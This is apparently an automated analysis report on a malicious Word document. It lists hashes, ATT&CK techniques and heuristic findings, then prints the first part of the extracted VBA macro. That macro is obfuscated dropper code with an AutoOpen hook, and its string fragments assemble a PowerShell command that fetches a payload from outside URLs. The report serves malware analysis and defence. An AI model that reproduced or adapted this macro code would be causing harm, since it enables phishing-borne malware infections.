Office (OLE) malware analysis — malicious · 44dab3cab64eb608

MALICIOUS

Office (OLE)

206.0 KB Created: 2017-12-11 08:32:00 Authoring application: Microsoft Office Word First seen: 2019-01-25

MD5: d95692ae35921f0ab040b37a54939583 SHA-1: d825451eb0417a1242906c3281e38c5727c5d550 SHA-256: 44dab3cab64eb60807fb2a88f0954cbd58d6bf389d910f547f3bcb58170ebe8f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening. The macro utilizes a Shell() call, indicating an attempt to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports this assessment.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 210,944 bytes but its declared streams total only 24,665 bytes — 186,279 bytes (88%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 82198 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	82198 bytes
SHA-256: `3d003ecf2f69647dbaafba1ae334ce625a63fdd3ac2bd4eee19e59349587c80e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "GJwOFcGfqaH" Function YQErrojjzZT() zIMPzdYpw = UCase("PJTYRLdn" + "YcXiOMZHiEDV" + "EEqXzNm" + "BsJAsRftvkc" + "fBkhIVRmIljImO") + UCase("PhuMQAJ" + "kOdWvuOnUa" + "VCTJPdvzUQ" + "AOdMQLBX" + "wWiASiwW") qOPpHaz = Mid("ihtrc9SlACE(rpa4l7rpa,[StRiwJi+wJinG][cHAr]92).rE'+'PlACE(rpa38QLbN", 8, 55) uOCqBj = UCase("tCaGwHwn" + "lSUuwAaHwwm" + "JNkiYLiThL" + "CJJlqliP" + "mqlpJkhkNpYqOk") + UCase("pqbawUTwaGSl" + "PkVPinlScuVni" + "FrnWnYZvzJITiS" + "KjrzsVdUIHawRN" + "GnSaNEnkiMPTkL") HBnhjzpc = UCase("tzMhRtBvYiiUA" + "HYNPsiiCmwOWw" + "TqliZHaSzT" + "kLUmWpqwhWcFOG" + "OrLQSuuccisDv") + UCase("OoYtSHXJQPGYYR" + "qlWYmsj" + "jACqisEd" + "vESiDLwwQFaw" + "uWcalzVf") XvANrVWsz = UCase("jAURNqYuoZ" + "wOzUjTNLpQM" + "UJoGdnHXjqKN" + "pOLmOYzAmGw" + "stDPnRDUQzHZj") + UCase("GhBwGElqtEBZar" + "jiDpNluE" + "tYGtNqGm" + "USRwqzu" + "CAwNOrMH") CGZtmSRBvrW = Mid("CCwFwlaa0padrpa+rpaom;3rpa+rlUH21J7wdiJr4kEUG4A0RiKPjEWr", 10, 19) EbswmvlEGua = UCase("AfhptPRo" + "LlVcTwTnZ" + "ZVnIKaGfNHH" + "HGmDnAOS" + "hboOKnSDiHwX") + UCase("FnMWWOmjDhJEdO" + "PLSYHtsuztAmo" + "jAJkMBzrQdz" + "ziuiKjZcnTo" + "PCMsNcWcwH") ASsaREQ = UCase("RDjWJMdtChzs" + "CzPWGZvlrDu" + "iuFuiht" + "jZDCjKGoEnSw" + "azAwrknMv") + UCase("zpPbSXzXAE" + "wduMpvS" + "hDlzrIwE" + "nwGalzDNQjoQFP" + "sIiTGlBpU") mdpHzOvQC = UCase("RDDIJrdSl" + "PclimfzYM" + "vRmYSDKR" + "VtpoAQPbfCTSPs" + "zwEvwwE") + UCase("IfWzRfpG" + "MVPXZolOXDU" + "ttfZiaUwOT" + "QihJiQzwpwnGuc" + "XKThavknOlq") NbJVisnz = Mid("JrUNOBY9Carpa+rpabcrpa+rpa in 3mybKSivKMorl773Ll", 10, 25) amMzJ = UCase("OWOrYSV" + "CkDwfKirw" + "LiqcnTFiid" + "KlHlVWcoWsQSzC" + "OudTpOncdpO") + UCase("jvlposUszvMK" + "BCcjuMtZIELFK" + "kXIivGkttkCba" + "KfShSfnLKwi" + "UMaqakiEjUr") uwFhcUzOmM = UCase("iEVHRsVzps" + "GzZGiaGnlzC" + "JfjsEfu" + "XnrPsUpVO" + "cqifMkBoGN") + UCase("wFcfALbk" + "RTuaGTGJOKlkZM" + "MZiSwrPZhJ" + "iPkrINkOHJ" + "EYtirawbXZsHTb") jOwUlFtfzHc = UCase("NDJzVkUL" + "BWZOSqYahHQu" + "YuwZzcDHvGYBD" + "YoMQtaPKrjl" + "jbSSTsR") + UCase("fPAwmrHfFP" + "MPPzmUq" + "TdOCNnusco" + "njjiwJnQdBS" + "EciZoUbjzdVw") ZKFoNHOwu = Mid("rPcESQ2tm+[CHAR]116),[CHAR]36 -rEPlACe'wJi',[CHAR]39-rEPlACe ([CHzl", 10, 57) HMooWi = UCase("IoHBtNQjkrZW" + "YAKFLPU" + "ZSApdFl" + "pHRQbEw" + "FPinsInR") + UCase("vDXOnwD" + "bjVHMQIi" + "vjIGZTDDAvh" + "NQfiliBOmCLN" + "AVaztzaI") FJIQvkjCd = UCase("QMnIszfqcbVcj" + "qwEMVAtKa" + "OGYBIjKKlrf" + "AHlCnsbANwHBlh" + "QzwzGlIumaiiw") + UCase("KrpmswwaS" + "AiZRRwWPb" + "tLntZLrNzcIKf" + "DFROsivqhkzX" + "qdnDOHIW") qUhziXMV = UCase("Evqfzlijf" + "cDhfJqHz" + "iaMqOjvSpQA" + "wjFOKlXqTP" + "TJObnjp") + UCase("NUJMsrFbzCTp" + "iqfUcQzFk" + "ISXtjzEH" + "zjnAmWNXFJXn" + "amoSiHLPqbcLBt") ijhlPjJAA = Mid("rJi+rp'+'a,rpa+rpahrpa+rpwJi+wJiattp:/rpa+rpa/karpetmurpa+rparrpa+rpaarpa+rpahrpa+rpa.nrpa+rpaet/hJ3ap/rpa+rpa,htrpa'+'+rpatp:rpa+rpa//piwJi+wJittmans.rpa'JS975pd2vj", 2, 154) HFPfw = UCase("EwNjHjbqEqDpOM" + "HXsrDiCvCzAk" + "YtCWNEAV" + "LbMOqjG" + "WcQGwrORTU") + UCase("AKjGzPS" + "nhcJLLFL" + "fonWoidYT" + "bCoFujw" + "rfVMzXVTmu") UYulHm = UCase("wYbuuhqjrp" + "zOtuvMVIskFOQw" + "VJIKplcsZhhctS" + "FwdpKwWvfPps" + "ksJKwwM") + UCase("YhAIUWUNNkcq" + "fIkbmAzN" + "uztaIjXXivG" + "hPdhpZB" + "RfNBuEkZjLzM") THHLAzj = UCase("vWOpLEiK" + "WHLQjSPP" + "OAJBUAbtlqRAz" + "TFAMlfo" + "EmNznQWhu") + UCase("OLjjztBONRSrs" + "ZBrLfFdk" + "vvWoVML" + "EwYmlWkFGL" + "RWANuBZlYL") ZRYiMw = Mid("s4GqbP2Ed4juaGFJK6sBPLplAcE ([chAr]114+[chAr]112+[chAr]97),[chAr]39 '+' -rEplAcE wJiVadwJi,[chAr]124) sKG. ( B8tshe'+'LLId[1]+B8tshElLID[13]+w'+'JiXwJi)') -rEPlACe ([CHAR]66+[CHAR]560V1Z6r2GAUjFB", 23, 163) acYUWAdkRQM = UCase("umAOtOoqq" + "hkEzsHu" + "azfLOlsjDvwnSz" + "kmccSvLNraajQ" + "HsRoOXOnjYOWM") + UCase("ssDmjrTL" + "ibBPknloF" + "qwDjwEZiwDE" + "viAUzX ... (truncated)

SHA-256: 3d003ecf2f69647dbaafba1ae334ce625a63fdd3ac2bd4eee19e59349587c80e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GJwOFcGfqaH"
Function YQErrojjzZT()
zIMPzdYpw = UCase("PJTYRLdn" + "YcXiOMZHiEDV" + "EEqXzNm" + "BsJAsRftvkc" + "fBkhIVRmIljImO") + UCase("PhuMQAJ" + "kOdWvuOnUa" + "VCTJPdvzUQ" + "AOdMQLBX" + "wWiASiwW")
qOPpHaz = Mid("ihtrc9SlACE(rpa4l7rpa,[StRiwJi+wJinG][cHAr]92).rE'+'PlACE(rpa38QLbN", 8, 55)
uOCqBj = UCase("tCaGwHwn" + "lSUuwAaHwwm" + "JNkiYLiThL" + "CJJlqliP" + "mqlpJkhkNpYqOk") + UCase("pqbawUTwaGSl" + "PkVPinlScuVni" + "FrnWnYZvzJITiS" + "KjrzsVdUIHawRN" + "GnSaNEnkiMPTkL")
HBnhjzpc = UCase("tzMhRtBvYiiUA" + "HYNPsiiCmwOWw" + "TqliZHaSzT" + "kLUmWpqwhWcFOG" + "OrLQSuuccisDv") + UCase("OoYtSHXJQPGYYR" + "qlWYmsj" + "jACqisEd" + "vESiDLwwQFaw" + "uWcalzVf")
XvANrVWsz = UCase("jAURNqYuoZ" + "wOzUjTNLpQM" + "UJoGdnHXjqKN" + "pOLmOYzAmGw" + "stDPnRDUQzHZj") + UCase("GhBwGElqtEBZar" + "jiDpNluE" + "tYGtNqGm" + "USRwqzu" + "CAwNOrMH")
CGZtmSRBvrW = Mid("CCwFwlaa0padrpa+rpaom;3rpa+rlUH21J7wdiJr4kEUG4A0RiKPjEWr", 10, 19)
EbswmvlEGua = UCase("AfhptPRo" + "LlVcTwTnZ" + "ZVnIKaGfNHH" + "HGmDnAOS" + "hboOKnSDiHwX") + UCase("FnMWWOmjDhJEdO" + "PLSYHtsuztAmo" + "jAJkMBzrQdz" + "ziuiKjZcnTo" + "PCMsNcWcwH")
ASsaREQ = UCase("RDjWJMdtChzs" + "CzPWGZvlrDu" + "iuFuiht" + "jZDCjKGoEnSw" + "azAwrknMv") + UCase("zpPbSXzXAE" + "wduMpvS" + "hDlzrIwE" + "nwGalzDNQjoQFP" + "sIiTGlBpU")
mdpHzOvQC = UCase("RDDIJrdSl" + "PclimfzYM" + "vRmYSDKR" + "VtpoAQPbfCTSPs" + "zwEvwwE") + UCase("IfWzRfpG" + "MVPXZolOXDU" + "ttfZiaUwOT" + "QihJiQzwpwnGuc" + "XKThavknOlq")
NbJVisnz = Mid("JrUNOBY9Carpa+rpabcrpa+rpa in 3mybKSivKMorl773Ll", 10, 25)
amMzJ = UCase("OWOrYSV" + "CkDwfKirw" + "LiqcnTFiid" + "KlHlVWcoWsQSzC" + "OudTpOncdpO") + UCase("jvlposUszvMK" + "BCcjuMtZIELFK" + "kXIivGkttkCba" + "KfShSfnLKwi" + "UMaqakiEjUr")
uwFhcUzOmM = UCase("iEVHRsVzps" + "GzZGiaGnlzC" + "JfjsEfu" + "XnrPsUpVO" + "cqifMkBoGN") + UCase("wFcfALbk" + "RTuaGTGJOKlkZM" + "MZiSwrPZhJ" + "iPkrINkOHJ" + "EYtirawbXZsHTb")
jOwUlFtfzHc = UCase("NDJzVkUL" + "BWZOSqYahHQu" + "YuwZzcDHvGYBD" + "YoMQtaPKrjl" + "jbSSTsR") + UCase("fPAwmrHfFP" + "MPPzmUq" + "TdOCNnusco" + "njjiwJnQdBS" + "EciZoUbjzdVw")
ZKFoNHOwu = Mid("rPcESQ2tm+[CHAR]116),[CHAR]36  -rEPlACe'wJi',[CHAR]39-rEPlACe ([CHzl", 10, 57)
HMooWi = UCase("IoHBtNQjkrZW" + "YAKFLPU" + "ZSApdFl" + "pHRQbEw" + "FPinsInR") + UCase("vDXOnwD" + "bjVHMQIi" + "vjIGZTDDAvh" + "NQfiliBOmCLN" + "AVaztzaI")
FJIQvkjCd = UCase("QMnIszfqcbVcj" + "qwEMVAtKa" + "OGYBIjKKlrf" + "AHlCnsbANwHBlh" + "QzwzGlIumaiiw") + UCase("KrpmswwaS" + "AiZRRwWPb" + "tLntZLrNzcIKf" + "DFROsivqhkzX" + "qdnDOHIW")
qUhziXMV = UCase("Evqfzlijf" + "cDhfJqHz" + "iaMqOjvSpQA" + "wjFOKlXqTP" + "TJObnjp") + UCase("NUJMsrFbzCTp" + "iqfUcQzFk" + "ISXtjzEH" + "zjnAmWNXFJXn" + "amoSiHLPqbcLBt")
ijhlPjJAA = Mid("rJi+rp'+'a,rpa+rpahrpa+rpwJi+wJiattp:/rpa+rpa/karpetmurpa+rparrpa+rpaarpa+rpahrpa+rpa.nrpa+rpaet/hJ3ap/rpa+rpa,htrpa'+'+rpatp:rpa+rpa//piwJi+wJittmans.rpa'JS975pd2vj", 2, 154)
HFPfw = UCase("EwNjHjbqEqDpOM" + "HXsrDiCvCzAk" + "YtCWNEAV" + "LbMOqjG" + "WcQGwrORTU") + UCase("AKjGzPS" + "nhcJLLFL" + "fonWoidYT" + "bCoFujw" + "rfVMzXVTmu")
UYulHm = UCase("wYbuuhqjrp" + "zOtuvMVIskFOQw" + "VJIKplcsZhhctS" + "FwdpKwWvfPps" + "ksJKwwM") + UCase("YhAIUWUNNkcq" + "fIkbmAzN" + "uztaIjXXivG" + "hPdhpZB" + "RfNBuEkZjLzM")
THHLAzj = UCase("vWOpLEiK" + "WHLQjSPP" + "OAJBUAbtlqRAz" + "TFAMlfo" + "EmNznQWhu") + UCase("OLjjztBONRSrs" + "ZBrLfFdk" + "vvWoVML" + "EwYmlWkFGL" + "RWANuBZlYL")
ZRYiMw = Mid("s4GqbP2Ed4juaGFJK6sBPLplAcE  ([chAr]114+[chAr]112+[chAr]97),[chAr]39 '+' -rEplAcE  wJiVadwJi,[chAr]124) sKG. ( B8tshe'+'LLId[1]+B8tshElLID[13]+w'+'JiXwJi)') -rEPlACe  ([CHAR]66+[CHAR]560V1Z6r2GAUjFB", 23, 163)
acYUWAdkRQM = UCase("umAOtOoqq" + "hkEzsHu" + "azfLOlsjDvwnSz" + "kmccSvLNraajQ" + "HsRoOXOnjYOWM") + UCase("ssDmjrTL" + "ibBPknloF" + "qwDjwEZiwDE" + "viAUzX
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.